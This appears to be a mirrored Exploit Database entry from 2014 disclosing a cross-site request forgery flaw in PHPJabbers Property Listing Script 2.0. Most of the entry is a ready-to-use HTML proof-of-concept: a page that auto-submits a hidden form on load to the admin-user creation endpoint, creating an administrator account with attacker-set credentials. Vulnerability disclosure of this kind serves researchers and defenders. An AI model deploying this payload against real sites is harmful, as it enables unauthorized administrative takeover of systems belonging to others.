PHPJabbers Property Listing Script 2.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 21 阅读

• 作者： HackXBack
  日期： 2014-01-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30952/

• Property Listing Script V2.0 - Add Admin CSRF Vulnerability
  ====================================================================
  
  ####################################################################
  .:. Author : HackXBack
  .:. Contact: h-b@usa.com
  .:. Home : http://www.iphobos.com/blog/
  .:. Script : http://www.phpjabbers.com/property-listing-script/
  ####################################################################
  
  ===[ Exploit ]===
  
  Cross Site Request Forgery
  ==========================
  
  [Add Admin]
  
  <html>
  <body onload="document.form0.submit();">
  <form method="POST" name="form0" action="
  http://site/index.php?controller=AdminUsers&action=create"
  enctype="multipart/form-data">
  <input type="hidden" name="user_create" value="1" />
  <input type="hidden" name="full_name" value="Iphobos" />
  <input type="hidden" name="username" value="Admin" />
  <input type="hidden" name="password" value="Password" />
  <input type="hidden" name="status" value="T" />
  <input type="hidden" name="role_id" value="1" />
  <input type="submit" value="Submit form" />
  </form>
  </body>
  </html>
  
  ####################################################################